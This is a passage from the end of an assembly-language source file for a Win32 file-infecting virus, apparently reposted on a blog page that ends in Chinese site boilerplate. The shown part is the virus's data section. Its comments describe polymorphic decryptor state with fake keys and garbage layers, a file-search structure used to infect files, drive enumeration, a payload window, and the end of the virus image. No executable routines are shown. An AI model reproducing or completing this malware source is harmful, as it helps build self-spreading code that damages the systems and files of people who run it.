XrndReg dd 00000000h
XrndFixPtr dd 00000000h
XrndMath dd 00000000h

counter_mask db 00h ;Mask of register used as counter
recursive_level db 00h ;Garbage recursive layer
IsFirst db 00h ;Save registers only on 1st decryptor

fake_field equ $

ptr_disp dd 00000000h ;Displacement from index
fake_ptr_disp dd 00000000h ;...and fake one

crypt_key dd 00000000h ;Encryption key
fake_crypt_key dd 00000000h ;...and fake one

build_flags db 00h ;Some decryptor flags
fake_build_flags db 00h ;...and fake ones

oper_size db 00h ;Size used (1=Byte 2=Word 4=Dword)
fake_oper_size db 00h ;...and fake one

index_mask db 00h ;Mask of register used as index
fake_index_mask db 00h ;...and fake one

TblStdPshP equ $

dd 00000000h
dd 00000000h
dd 00000000h
dd 00000000h

PshPStepIndex dd 00000004h dup (00000000h)

NUM_DA equ 10h

NumberOfDataAreas db 00h

tbl_data_area db NUM_DA*08h dup (00h)

;============================================================================
;SYSTEMTIME structure used by GetLocalTime
;============================================================================

local_time equ $

LT_Year dw 0000h
LT_Month dw 0000h
LT_DayOfWeek dw 0000h
LT_Day dw 0000h
LT_Hour dw 0000h
LT_Minute dw 0000h
LT_Second dw 0000h
LT_Milliseconds dw 0000h

;============================================================================
;A rect structure used in the payload
;============================================================================

WindowRect equ $

WR_left dd 00000000h
WR_top dd 00000000h
WR_right dd 00000000h
WR_bottom dd 00000000h

;============================================================================
;This is a WIN32 FindData structure used to infect files, and some
;auxiliary variables
;============================================================================

FileSizeOnDisk dd 00000000h
FatSize dd 00000000h

FT_CreationTime db 08h dup (00h)
FT_LastAccessTime db 08h dup (00h)
FT_LastWriteTime db 08h dup (00h)

h_Find dd 00000000h
DirectFindData db SIZEOF_WIN32_FIND_DATA dup (00h)

;============================================================================
;Used to retrieve current, windows and system directories
;============================================================================

BufGetDir db MAX_PATH+01h dup (00000000h)

;============================================================================
;Used to get logical drives
;============================================================================

SIZEOF_LDSB equ MAX_PATH

szLogicalDrives db SIZEOF_LDSB dup (00000000h)

;============================================================================
;End of virus image in allocated memory
;============================================================================

alloc_size equ $-viro_sys

virseg ends
end host_code
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值